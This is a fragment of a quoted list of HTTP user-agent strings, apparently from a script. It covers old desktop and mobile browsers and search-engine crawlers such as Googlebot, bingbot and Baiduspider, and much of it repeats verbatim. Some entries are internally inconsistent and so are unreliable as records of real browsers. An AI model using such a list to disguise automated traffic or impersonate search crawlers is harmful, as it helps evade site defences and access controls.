'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
